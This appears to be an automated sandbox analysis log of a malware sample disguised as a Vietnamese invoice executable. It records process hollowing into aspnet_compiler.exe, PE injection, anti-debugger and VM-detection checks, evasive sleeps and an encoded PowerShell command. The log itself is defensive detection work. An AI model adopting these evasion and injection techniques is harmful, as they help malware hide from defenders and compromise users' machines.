Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe TID: 868	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe TID: 5128	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5160	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 5392	Thread sleep count: 44 > 30	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Last function: Thread delayed

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,

14_2_0040DD85

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Window / User API: threadDelayed 9489

Jump to behavior

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: dwn.exe, 00000011.00000002.561697222.0000000004345000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SQEMU\[_EbDU
Source: aspnet_compiler.exe, 0000000C.00000002.524221761.0000000001367000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oy
Source: Shhejayly.exe, 00000012.00000002.567010928.0000000006EEC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
Source: Shhejayly.exe, 00000012.00000002.528271926.00000000007FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: aspnet_compiler.exe, 0000000C.00000002.524221761.0000000001367000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWt
Source: aspnet_compiler.exe, 0000000C.00000002.525361039.000000000137D000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000003.355610378.0000000001377000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Shhejayly.exe, 0000001C.00000002.534013224.000000000091B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
Source: Shhejayly.exe, 00000012.00000002.528271926.00000000007FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.353332001.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.528271926.00000000007FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: aspnet_compiler.exe, 0000000C.00000002.524221761.0000000001367000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\oy

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 14_2_00418981 memset,GetSystemInfo,

14_2_00418981

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 12_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	12_2_100010F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 12_2_10006580 FindFirstFileExA,	12_2_10006580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0040AE51 FindFirstFileW,FindNextFileW,	14_2_0040AE51

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

14_2_0040DD85

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 14_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,

14_2_004044A4

Contains functionality to read the PEB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 12_2_10004AB4 mov eax, dword ptr fs:[00000030h]

12_2_10004AB4

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 12_2_10002639 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

12_2_10002639

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 12_2_1000724E GetProcessHeap,

12_2_1000724E

Enables debug privileges

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 12_2_10002639 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_10002639
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 12_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_100060E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 12_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_10002B1C

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Encrypted powershell cmdline option found

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process created: Base64 decoded start-sleep -seconds 20
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process created: Base64 decoded start-sleep -seconds 20			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A

Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section unmapped: unknown base address: 400000	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 456000	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 46E000	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 474000	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 475000	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 476000	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 47B000	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: F55008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: aspnet_compiler.exe, 0000000C.00000002.533978601.0000000004032000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerF
Source: aspnet_compiler.exe, 0000000C.00000002.533978601.0000000004032000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: aspnet_compiler.exe, 0000000C.00000002.534251158.000000000403F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.534069193.0000000004037000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000003.477736669.0000000004001000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
